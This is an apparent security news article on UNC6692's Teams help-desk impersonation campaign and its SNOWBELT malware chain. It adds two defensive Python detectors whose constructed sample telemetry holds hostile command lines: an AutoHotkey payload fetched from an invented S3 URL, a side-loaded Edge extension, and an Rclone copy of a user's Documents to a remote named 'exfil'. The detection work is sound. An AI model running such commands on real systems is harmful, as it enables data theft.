A previously undocumented threat group, tracked as UNC6692, has been reported abusing Microsoft Teams to deliver a custom malware suite to compromised systems. The activity relies on social engineering, specifically impersonating IT help desk staff to persuade victims into accepting chat invitations from external accounts.
Attack Methodology
According to a report by Mandiant, UNC6692 first floods targets' inboxes with a large spam campaign (an email-bombing run) to create a sense of urgency. The group then contacts the victim through Microsoft Teams, posing as IT support offering help with the email problem. This tactic mirrors methods previously used by affiliates of the now-defunct Black Basta group, which relied on the same help-desk impersonation.
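The sequence above, a burst of inbound mail followed by an external Teams chat, is something a SOC can correlate from tenant audit data. The Python below is an added example written for this article, not tooling from Mandiant, ReliaQuest or the group's victims; the event shape (MailReceived and TeamsChatCreated records with ts, user, sender and initiator fields), the tenant domain corp.example, the thresholds and the sample events are all constructed assumptions standing in for whatever your Exchange and Teams audit export actually looks like.

```python
from collections import defaultdict
from datetime import datetime, timedelta

BURST_THRESHOLD = 20                   # messages to one user inside BURST_WINDOW (tune to baseline)
BURST_WINDOW = timedelta(minutes=10)
FOLLOWUP_WINDOW = timedelta(hours=2)   # how soon after the bomb the "help desk" tends to call
INTERNAL_DOMAIN = "corp.example"       # assumed tenant domain (constructed for the example)


def parse_ts(s):
    return datetime.fromisoformat(s)


def build_sample_events():
    """Constructed sample data, not real telemetry: one user gets 25 sign-up mails in
    six minutes and an external Teams chat 40 minutes later; a second user receives
    normal mail volume plus an external chat, which must not fire."""
    events = []
    base = parse_ts("2026-03-10T09:00:00")
    for i in range(25):
        events.append({"ts": base + timedelta(seconds=15 * i), "type": "MailReceived",
                       "user": "cfo@corp.example", "sender": f"signup{i}@example.net"})
    events.append({"ts": base + timedelta(minutes=40), "type": "TeamsChatCreated",
                   "user": "cfo@corp.example", "initiator": "helpdesk@it-support-portal.example"})
    for i in range(5):
        events.append({"ts": base + timedelta(minutes=i), "type": "MailReceived",
                       "user": "eng@corp.example", "sender": "colleague@corp.example"})
    events.append({"ts": base + timedelta(minutes=50), "type": "TeamsChatCreated",
                   "user": "eng@corp.example", "initiator": "partner@vendor.example"})
    return events


def find_mail_bursts(events, threshold=BURST_THRESHOLD, window=BURST_WINDOW):
    """Sliding window over MailReceived events per recipient. Returns {user: time the
    first window crossed the threshold}, i.e. when the bomb became obvious."""
    per_user = defaultdict(list)
    for e in events:
        if e["type"] == "MailReceived":
            per_user[e["user"]].append(e["ts"])
    bursts = {}
    for user, times in per_user.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                bursts[user] = t
                break
    return bursts


def is_external(account, internal_domain=INTERNAL_DOMAIN):
    """External here means 'not our tenant'; a real check would use the tenant ID."""
    return not account.lower().endswith("@" + internal_domain)


def detect_bomb_then_teams(events, followup=FOLLOWUP_WINDOW):
    """Flag externally initiated Teams chats that land shortly after a mail burst
    against the same user. Internal chats and chats without a preceding burst are ignored."""
    bursts = find_mail_bursts(events)
    hits = []
    for e in sorted(events, key=lambda x: x["ts"]):
        if e["type"] != "TeamsChatCreated" or not is_external(e["initiator"]):
            continue
        burst_end = bursts.get(e["user"])
        if burst_end is not None and timedelta(0) <= e["ts"] - burst_end <= followup:
            hits.append({"user": e["user"], "external_initiator": e["initiator"],
                         "burst_ended": burst_end.isoformat(), "chat_at": e["ts"].isoformat()})
    return hits


if __name__ == "__main__":
    for hit in detect_bomb_then_teams(build_sample_events()):
        print(hit)
```

The two knobs that matter are the burst threshold and the follow-up window: set the threshold from your own per-mailbox baseline rather than the value above, and keep the follow-up window generous, since the operator only needs the victim to still be annoyed when the chat arrives.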
Target Demographics
Data from ReliaQuest indicates that between March 1 and April 1, 2026, 77% of the incidents attributed to UNC6692 targeted senior-level employees, up from 59% in the preceding months. The shift points to a deliberate focus on high-ranking individuals, whose accounts give the group initial access to corporate networks and, from there, opportunities for data theft and other follow-on activity.
Malware Deployment and Functionality
The attack chain departs from the usual help-desk playbook: the victim is directed to a phishing link shared in the Teams chat, presented as a patch for the spam problem. The link downloads an AutoHotkey script hosted in an AWS S3 bucket. The script performs reconnaissance and installs SNOWBELT, a malicious browser extension for Microsoft Edge that acts as a loader for further payloads.
Once installed, SNOWBELT retrieves additional components, including SNOWGLAZE and SNOWBASIN, which handle roles such as establishing communication channels with the operators and enabling remote command execution.
Exfiltration and Persistence Techniques
UNC6692 employs a range of post-exploitation tactics, including lateral movement and credential harvesting. The malware ecosystem supports scanning local networks, establishing remote sessions, and exfiltrating sensitive data with tools such as Rclone. Routing command-and-control and exfiltration through legitimate cloud services lets the group blend into normal enterprise traffic and evade detection.
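The endpoint side of the chain described in the last two sections (an AutoHotkey script fetched from S3 via a browser, an Edge extension, then Rclone pushing data to a cloud remote) leaves process-creation telemetry that can be hunted over. The Python below is an added example, not code from Mandiant or the article. Its events are constructed Sysmon-style records (Image, CommandLine, ParentImage) with invented hostnames, paths and bucket name; the rule that treats msedge.exe with --load-extension as a sideloaded extension is an assumption about how a non-store extension might be loaded, since the reporting does not say how SNOWBELT is installed. Each rule is a generic signal for one stage; the useful part is escalating when several stages appear on one host within a short window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

BROWSERS = {"msedge.exe", "chrome.exe", "firefox.exe"}
CHAIN_WINDOW = timedelta(hours=1)  # escalate when 3+ distinct stages hit one host inside this window


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rclone_to_remote(cmdline):
    """True for 'rclone <copy|sync|move> ... <remote>:<path>'. A token shaped like
    name:... that is not a drive path (C:\\...) is an rclone remote, i.e. an upload."""
    toks = cmdline.split()
    if not any(t.lower() in ("copy", "sync", "move") for t in toks):
        return False
    return any(re.match(r"^[A-Za-z0-9_-]+:", t) and not re.match(r"^[A-Za-z]:[\\/]", t)
               for t in toks)


# One predicate per stage of the reported chain; these are behavioural signals, not IOCs.
RULES = {
    "ahk_launched_by_browser": lambda e: basename(e["Image"]).startswith("autohotkey")
                                          and basename(e["ParentImage"]) in BROWSERS,
    "s3_url_in_cmdline": lambda e: re.search(r"https?://\S*\.amazonaws\.com/",
                                             e["CommandLine"], re.I) is not None,
    "edge_sideloaded_extension": lambda e: basename(e["Image"]) == "msedge.exe"
                                            and "--load-extension" in e["CommandLine"].lower(),
    "rclone_upload": lambda e: basename(e["Image"]) == "rclone.exe"
                                and rclone_to_remote(e["CommandLine"]),
}


def hunt(events, chain_window=CHAIN_WINDOW):
    """Return individual rule hits plus hosts where 3+ distinct stages occur within chain_window."""
    hits = [{"host": e["host"], "ts": e["ts"], "rule": name, "cmd": e["CommandLine"]}
            for e in events for name, pred in RULES.items() if pred(e)]
    by_host = defaultdict(list)
    for h in hits:
        by_host[h["host"]].append(h)
    chains = []
    for host, hs in by_host.items():
        hs.sort(key=lambda h: h["ts"])          # ISO timestamps sort lexicographically
        for i, first in enumerate(hs):
            t0 = datetime.fromisoformat(first["ts"])
            stages = {h["rule"] for h in hs[i:]
                      if datetime.fromisoformat(h["ts"]) - t0 <= chain_window}
            if len(stages) >= 3:
                chains.append({"host": host, "from": first["ts"], "stages": sorted(stages)})
                break
    return {"hits": hits, "chains": chains}


EDGE = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
TEAMS = r"C:\Program Files\WindowsApps\MSTeams_8wekyb3d8bbwe\ms-teams.exe"
AHK = r"C:\Users\cfo\Downloads\AutoHotkey64.exe"

# Constructed sample telemetry (hostnames, paths and bucket name are invented):
# one workstation shows the full chain, a developer box runs AutoHotkey legitimately.
SAMPLE_EVENTS = [
    {"ts": "2026-03-12T14:02:10", "host": "WS-CFO-01", "Image": TEAMS,
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "ms-teams.exe"},
    {"ts": "2026-03-12T14:03:05", "host": "WS-CFO-01", "Image": EDGE, "ParentImage": TEAMS,
     "CommandLine": "msedge.exe https://patch-cdn-01.s3.amazonaws.com/fix-spam.ahk"},
    {"ts": "2026-03-12T14:03:30", "host": "WS-CFO-01", "Image": AHK, "ParentImage": EDGE,
     "CommandLine": r"AutoHotkey64.exe C:\Users\cfo\Downloads\fix-spam.ahk"},
    {"ts": "2026-03-12T14:03:45", "host": "WS-CFO-01", "Image": EDGE, "ParentImage": AHK,
     "CommandLine": r'msedge.exe --load-extension="C:\Users\cfo\AppData\Local\Temp\ext"'},
    {"ts": "2026-03-12T14:21:00", "host": "WS-CFO-01",
     "Image": r"C:\Users\cfo\AppData\Local\Temp\rclone.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"rclone.exe copy C:\Users\cfo\Documents remote:exfil --transfers 8"},
    {"ts": "2026-03-12T15:10:00", "host": "WS-DEV-07",
     "Image": r"C:\Program Files\AutoHotkey\AutoHotkey.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "AutoHotkey.exe macros.ahk"},
]

if __name__ == "__main__":
    result = hunt(SAMPLE_EVENTS)
    for h in result["hits"]:
        print(h["host"], h["ts"], h["rule"])
    for c in result["chains"]:
        print("CHAIN", c)
```

Any single rule here will be noisy on its own (developers run AutoHotkey, backup jobs run rclone), which is why the developer host in the sample data produces nothing: the parent-process condition and the per-host chain scoring are what turn four weak signals into something worth paging on.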
Microsoft has acknowledged the growing trend of collaboration tools such as Teams being abused this way, and has urged organizations to enforce strict identity verification for help-desk interactions and to tighten controls around remote support tools. In practice that means restricting external (federated) Teams access to an allow-list of trusted domains so unknown tenants cannot open chats with staff, and controlling which extensions Edge will load through browser policy rather than leaving it to the user.
This article was produced by NeonPulse.today using human and AI-assisted editorial processes, based on publicly available information. Content may be edited for clarity and style.